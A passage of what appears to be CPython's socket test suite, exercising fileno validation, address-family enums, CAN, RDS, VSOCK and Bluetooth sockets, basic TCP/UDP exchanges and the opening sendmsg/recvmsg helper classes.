s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
    @unittest.skipIf(os.name == "nt", "Windows only disallows a fileno of -1")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
def test_addressfamily_enum(self):
import _socket, enum
CheckedAddressFamily = enum._old_convert_(
enum.IntEnum, 'AddressFamily', 'socket',
lambda C: C.isupper() and C.startswith('AF_'),
source=_socket,
)
enum._test_simple_enum(CheckedAddressFamily, socket.AddressFamily)
def test_socketkind_enum(self):
import _socket, enum
CheckedSocketKind = enum._old_convert_(
enum.IntEnum, 'SocketKind', 'socket',
lambda C: C.isupper() and C.startswith('SOCK_'),
source=_socket,
)
enum._test_simple_enum(CheckedSocketKind, socket.SocketKind)
def test_msgflag_enum(self):
import _socket, enum
CheckedMsgFlag = enum._old_convert_(
enum.IntFlag, 'MsgFlag', 'socket',
lambda C: C.isupper() and C.startswith('MSG_'),
source=_socket,
)
enum._test_simple_enum(CheckedMsgFlag, socket.MsgFlag)
def test_addressinfo_enum(self):
import _socket, enum
CheckedAddressInfo = enum._old_convert_(
enum.IntFlag, 'AddressInfo', 'socket',
lambda C: C.isupper() and C.startswith('AI_'),
source=_socket)
enum._test_simple_enum(CheckedAddressInfo, socket.AddressInfo)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
        # most systems limit IFNAMSIZ to 16, so 1024 is comfortably over any limit
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
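        # A classic (non-FD) CAN frame is exactly 16 bytes; the BCM expects
        # the fixed-size bcm_msg_head to be followed immediately by
        # `nframes` such frames in a single send().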
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
        # most systems limit IFNAMSIZ to 16, so 1024 is comfortably over any limit
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
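#
# As a purely illustrative sketch (the concrete names below are assumptions
# about classes defined elsewhere in this module, not definitions made here),
# a final test class is typically assembled along these lines:
#
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass
#
# with SendrecvmsgUDPTestBase mixing SendrecvmsgDgramFlagsBase,
# SendrecvmsgConnectionlessBase and a UDP-specific SocketTestBase subclass.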
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
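    # (Connectionless subclasses override this with ([], [], 0, serv_addr),
    #  so tests can call sendmsgToServer([MSG]) uniformly regardless of
    #  socket type.)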
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
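        # Worked example: on a stream socket (all indicator attributes left
        # at 0), checkFlags(flags, eor=True) only requires MSG_CTRUNC and
        # MSG_OOB to be clear; on a datagram socket, where
        # msg_flags_non_eor_indicator includes MSG_TRUNC, eor=False
        # additionally requires MSG_TRUNC to be set.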
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
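        # recvmsg_into() returns (nbytes, ancdata, msg_flags, address);
        # convert that into the (data, ancdata, msg_flags, address) shape
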